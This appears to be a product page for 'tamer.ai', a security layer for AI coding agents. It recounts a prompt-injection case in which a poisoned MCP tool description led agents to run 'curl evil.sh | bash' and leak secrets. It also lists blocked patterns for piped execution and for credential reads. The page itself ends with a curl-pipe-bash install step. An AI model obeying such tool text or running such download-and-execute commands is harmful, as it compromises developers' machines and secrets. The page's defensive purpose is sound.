Real-world use cases

AI agents are powerful — but unchecked, they're dangerous. Here's how tamer.ai protects real teams in real scenarios.

USE CASE 1

Supply Chain Protection

How tamer.ai blocks AI-powered supply chain attacks before they reach your machine.

The Problem

In February 2026, the hackerbot-claw incident demonstrated a new attack vector: a malicious MCP server published as a legitimate tool tricked AI agents into executing curl | sh commands, downloading and running arbitrary code on developers' machines.

The AI agent followed instructions from the poisoned tool description — it had no way to know the payload was malicious. Thousands of machines were compromised before the package was flagged.

How Tamer Stops It

Download & Execute detection — blocks curl | sh, wget | bash, and other piped-execution patterns in real time
Data exfiltration guard — detects outbound smuggling of files, env vars, or credentials to unknown endpoints
CI/CD pipeline protection — prevents unauthorized modifications to .github/workflows/ and .gitlab-ci.yml
Credential access blocking — prevents reads of .env, API keys, and SSH keys regardless of agent intent
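The download-and-execute check above can be sketched as a simple command matcher. This is a minimal illustration of the idea, not tamer's actual detection engine; the names `DOWNLOAD_EXEC` and `is_download_exec` are hypothetical.

```python
import re

# Illustrative "download and execute" pattern: a fetch tool (curl/wget)
# piped into a shell interpreter (sh, bash, zsh, dash).
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget)\b[^|;&]*"  # fetch command and its arguments...
    r"\|\s*(ba|z|da)?sh\b"     # ...piped into a shell
)

def is_download_exec(command: str) -> bool:
    """Return True if the command matches a piped-execution pattern."""
    return DOWNLOAD_EXEC.search(command) is not None
```

A real guard would also normalize quoting, nested subshells, and indirections like `bash <(curl …)`, which this sketch deliberately ignores.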

Attack flow — with and without tamer

Without tamer
Malicious MCP tool → Agent: "Install this dependency"
→ curl evil.sh | bash
→ Payload executes freely
→ Secrets exfiltrated

With tamer
Malicious MCP tool → Agent: "Install this dependency"
→ curl evil.sh | bash
→ BLOCKED: download_exec pattern
→ Alert sent to your phone
USE CASE 2

Multi-Agent Supervision

Run a team of AI agents in parallel — with a Master that keeps them coordinated and under control.

The Problem

Running multiple AI agents on the same codebase leads to chaos: conflicting file edits, duplicated work, runaway approval prompts blocking your terminal, and no visibility into what each agent is actually doing.

Without coordination, two agents can edit the same file simultaneously, creating merge conflicts that neither can resolve. You end up babysitting each terminal instead of shipping code.

How Tamer Solves It

Master Agent — an AI supervisor that orchestrates workers, detects conflicts, and handles approvals automatically
Conflict detection — tracks every file each worker touches and alerts before edits collide
Role-based pipelines — assign coder, reviewer, tester roles. Claude codes, Gemini tests, Aider reviews — automatically
Pattern learning — the Master learns from your approval decisions and auto-approves safe patterns next time

Multi-agent pipeline architecture

Master Agent: orchestrates • detects conflicts • approves
├ Claude Code (coder)
├ Gemini CLI (tester)
└ Aider (reviewer)
Your Phone: dashboard • approve • intervene
USE CASE 3

Kernel-Level Sandbox

Confine every AI agent inside a kernel-enforced perimeter — even if the agent tries to break out.

The Problem

Application-level hooks can be bypassed. An AI agent with shell access can spawn a Python subprocess, open files directly, or use system calls that skip your security hooks entirely.

Your ~/.ssh keys, ~/.aws credentials, and .env files are all reachable — the agent just needs to know the path.

How Tamer Solves It

Landlock LSM (Linux) — filesystem access control at kernel level. The agent physically cannot read files outside its workspace.
seccomp-BPF — syscall filtering blocks network sockets, ptrace, mount, and privilege escalation.
Job Object (Windows) — process containment with resource limits and kill-on-close guarantees.
Two-layer defense — application hooks handle the daily workflow (alerts, approvals). The kernel sandbox is the last wall that never falls.
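One of the sandbox layers tamer lists is bubblewrap. As a rough sketch of what a kernel-enforced perimeter looks like in practice, here is a minimal `bwrap` invocation built in Python: system directories mounted read-only, the workspace as the only writable path, and all namespaces (including network) unshared. The flags are real bubblewrap options, but the policy shown is illustrative, not tamer's actual profile.

```python
import subprocess

def sandboxed_cmd(workspace: str, agent_cmd: list[str]) -> list[str]:
    """Build a bwrap command line that confines agent_cmd to workspace.

    Nothing outside the binds below exists inside the sandbox, so
    ~/.ssh, ~/.aws, and stray .env files are simply not reachable.
    """
    return [
        "bwrap",
        "--ro-bind", "/usr", "/usr",     # read-only toolchain
        "--ro-bind", "/etc", "/etc",
        "--symlink", "usr/bin", "/bin",
        "--symlink", "usr/lib", "/lib",
        "--proc", "/proc",
        "--dev", "/dev",
        "--tmpfs", "/tmp",
        "--bind", workspace, workspace,  # the only writable path
        "--unshare-all",                 # new namespaces, incl. network
        "--die-with-parent",             # kill the agent if tamer exits
        *agent_cmd,
    ]

# e.g. subprocess.run(sandboxed_cmd("/home/dev/project", ["claude"]))
```

Because the confinement comes from mount namespaces and the kernel, a spawned subprocess or raw syscall inherits the same walls; there is no hook to skip.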

Layered defense model

Your machine
└ Kernel sandbox: Landlock + seccomp + bubblewrap (the load-bearing wall)
  └ Path Protection hooks: alerts, approvals, fine-grained rules
    └ AI Agent: confined to workspace only
USE CASE 4

Skill Engine

Write a skill once, use it on any AI agent — Claude Code, Cursor, Windsurf, or any CLI tool.

The Problem

Every AI agent has its own way of handling instructions: Claude Code uses CLAUDE.md, Cursor uses .cursorrules, Windsurf uses .windsurfrules. If you switch agents or use multiple in a pipeline, you maintain the same knowledge in multiple incompatible formats.

Teams waste hours duplicating coding guidelines, review checklists, and debugging workflows across agent-specific config files.

How Tamer Solves It

Canonical format — one Markdown file per skill with structured frontmatter. Write once, tamer transforms it for each agent.
Multi-agent adapters — built-in transformers for Claude Code (CLAUDE.md injection), Cursor (.cursorrules), Windsurf (.windsurfrules), and a generic fallback.
CLI management — tamer skill install, tamer skill list, tamer skill remove. Simple, familiar.
Auto-install — skills can be pre-installed on tamer connect via config. Your whole team gets the same skills, every time.

One skill, every agent

Canonical skill (tamer format)
---
name: debug-react
trigger: "debug React"
agents: [claude, cursor, windsurf]
---
# Debug React Components
1. Check the error boundary...
2. Verify the hook deps...
Auto-transformed for each agent
Claude Code → injected into CLAUDE.md
Cursor → merged into .cursorrules
Windsurf → merged into .windsurfrules
Generic → .tamer/skills/ directory
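The transform step above can be sketched as a frontmatter parser plus a per-agent target map. The target file names come from the table above; the parsing code itself is an illustrative sketch, not tamer's adapter API.

```python
def parse_skill(text: str) -> tuple[dict, str]:
    """Split a canonical skill file into (frontmatter, body).

    Frontmatter is the '---'-delimited header; values are kept as
    raw strings (quotes and list brackets are not interpreted here).
    """
    _, header, body = text.split("---", 2)
    meta = {}
    for line in header.strip().splitlines():
        key, _, value = line.partition(":")
        meta[key.strip()] = value.strip()
    return meta, body.strip()

# Where each agent expects the transformed skill to land.
AGENT_TARGETS = {
    "claude": "CLAUDE.md",
    "cursor": ".cursorrules",
    "windsurf": ".windsurfrules",
}
```

An adapter would then append or merge the body into `AGENT_TARGETS[agent]` inside the project root, falling back to a generic skills directory for agents without a native format.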

Ready to tame your agents?

Three commands to full protection.

$ curl -fsSL https://server.tamer-ai.dev/install.sh | bash
$ tamer init
$ tamer claude